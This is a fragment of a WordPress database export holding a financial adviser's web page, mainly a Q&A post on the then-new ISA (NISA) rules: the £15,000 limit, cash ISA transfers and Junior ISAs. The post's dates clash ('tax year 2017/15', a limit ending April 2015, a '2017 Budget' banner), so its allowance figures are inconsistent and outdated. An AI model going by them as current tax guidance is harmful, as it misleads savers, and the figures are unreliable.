<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				<p class=\"web\">Web: <a href=\"/\">Investor London</a></p>&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;	Pension Reforms Offer Freedom to Savers','Read about','inherit','closed','closed','','90-revision-v1','','','2017-09-21 17:36:37','2017-09-21 17:36:37','',90,'http://www.equalitywalk.org.uk/90-revision-v1',0,'revision','',0),(330,1,'2017-09-21 17:36:49','2017-09-21 17:36:49','<body class=\"single single-post postid-8425 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"header-info\">The 2017 Budget Announcement Will Improve Pension Planning for Everyone. Make Sure You Know How? <b><a href=\"../pensions/pension-review/\">Learn More&gt;&gt;</a></b><a href=\"mailto:\"/></div>&#13;\n			</div>&#13;\n			<div class=\"alignright\">&#13;\n							</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR-Logo.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Us Now<br/><big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-2 col-span-2 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Stakeholder Pensions</a></li>&#13;\n		<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Occupational Pensions</a></li>&#13;\n		<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">More Information&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										The New Individual Savings Accounts										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li><a href=\"../category\" title=\"Investments\">Investments</a></li><li>The New Individual Savings Accounts</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8425\" class=\"post-8425 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">The New Individual Savings Accounts</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h1 style=\"text-align: center;\">The New Individual Savings Accounts – Q&amp;A<br/></h1>&#13;\n<h3 style=\"text-align: center;\">By : Reading Time 4 Minutes&#13;\n</h3><p/>&#13;\n<p> </p>&#13;\n<p>…Or NISAs as we must learn to call them.</p>&#13;\n<p>Most of the headlines surrounding George Osborne’s recent Budget focused on the far-reaching changes he made to pensions legislation – the ‘biggest shake-up of pensions for over a hundred years’ as he termed it.</p>&#13;\n<p>However there are also big changes planned for Individual Savings Accounts, with the rules being revised from July 1st this year.</p>&#13;\n<p>We know that a lot of our clients like to use ISAs for their savings and benefit from the tax advantages: this is likely to increase after July 1st. We therefore thought it might be helpful if we answered all the questions clients have been asking us about the proposed changes to the rules and the introduction of NISAs – New Individual Savings Accounts.</p>&#13;\n<p/>&#13;\n<p>Why has the Chancellor made these changes?</p>&#13;\n<p>George Osborne described his Budget as one for ‘the makers, the do-ers and the savers.’ He’s long been concerned that the average person in the UK borrows too much and saves too little and these changes are part of his attempt to address that.</p>&#13;\n<p>What’s he proposing?</p>&#13;\n<p>Firstly he’s proposing an increase in the annual ISA limit to £15,000. In the Autumn Statement last year the Chancellor said that the limit for the tax year 2017/15 would be £11,880 but – from July 1st – it will increase to £15,000 and that figure will apply until 5th April 2015, by which time we’ll have had the 2015 Budget speech.</p>&#13;\n<p>But I’ve already contributed my £11,880 for this year…</p>&#13;\n<p>No problem. From July 1st you’ll be able to contribute an additional £3,120 to bring you up to £15,000. If you have contributed £5,940 into a cash ISA, then you’ll be able to contribute an additional £9,060 from July 1st.</p>&#13;\n<p>So a husband and wife can save £30,000 a year in ISAs – or NISAs as we have to call them now?</p>&#13;\n<p>Yes.</p>&#13;\n<p>Will there still be a limit on what I can put into a cash ISA?</p>&#13;\n<p>It used to be the case that up to 50% of the annual allowance could go into a cash ISA but from July 1st that limit disappears. So the only limit will be the overall annual limit.</p>&#13;\n<p>Can I move my money from stocks and shares ISAs to cash as I get older/more cautious?</p>&#13;\n<p>Yes you can. This is another change that will be welcomed by our clients – previously you couldn’t do this, but from July 1st you will be able to.</p>&#13;\n<p>What about Junior ISAs?</p>&#13;\n<p>There’s good news here as well. The limit for Junior ISAs is increasing to £4,000 a year – and remember that if you are aged between 16 and 18 you can hold a cash ISA, but not a stocks and shares ISA.</p>&#13;\n<p>This means someone between 16 and 18 can pay the full £15,000 into a cash ISA.</p>&#13;\n<p>So all in all this is good news and NISAs will now be much more flexible? </p>&#13;\n<p>Absolutely. We think these changes are really good news and we’d expect NISAs to play a significant part in the financial planning of a lot of our clients. Interestingly though, there’ll probably be a need for more financial planning, not less. If say, a husband and wife have £30,000 in cash ISAs – as opposed to £11,880 under the old rules – then it’s going to be even more important that they’re receiving the very best interest rate on that money.</p>&#13;\n<p>Similarly if you have £15,000 in a stocks and shares ISA – and potentially a lot more as the investments build up over the years – the performance of your fund manager(s) becomes ever more important. So the changes to the ISA rules will probably mean working more closely with your financial advisers.</p>&#13;\n<p>Anything else?</p>&#13;\n<p>Only that we’ll be encouraging our clients to use these new allowances: as we’ve always stressed, it makes sense to make use of all the tax free allowances that are available to you.</p>&#13;\n<p>If you have any other questions on the changes to ISAs – or if you’d like any help on working out exactly what you can contribute in the current tax year – then as always don’t hesitate to contact us. We’re only a phone call or an e-mail away.</p>&#13;\n<p>Warmest regards</p>&#13;\n<p>Sam</p>&#13;\n<p style=\"text-align: center;\">THE VALUE OF INVESTMENTS AND INCOME FROM THEM AND MAY GO DOWN. YOU MAY NOT GET BACK THE ORIGINAL AMOUNT INVESTED</p>&#13;\n<p> </p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category\" title=\"View all posts in Investments\" rel=\"category tag\">Investments</a>, <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../new-individual-savings-accounts/\" title=\"Comment on The New Individual Savings Accounts\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;p[title]=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=The+New+Individual+Savings+Accounts%20http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fnew-individual-savings-accounts%2F&amp;name=The+New+Individual+Savings+Accounts&amp;description=We+know+that+a+lot+of+our+clients+like+to+use+ISAs+for+their+savings+and+benefit+from+the+tax+advantages%3A+this+is+likely+to+increase+after+July+1st.+We+therefore+thought+it+might+be+helpful+if+we+answered+all+the+questions+clients+have+been+asking+us+about+the+proposed+changes\" target=\"_blank\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=The New Individual Savings Accounts&amp;body=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../new-individual-savings-accounts/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8425\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"62bc530ba8\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"97\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>subscribers who get new content from us on a monthly basis</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					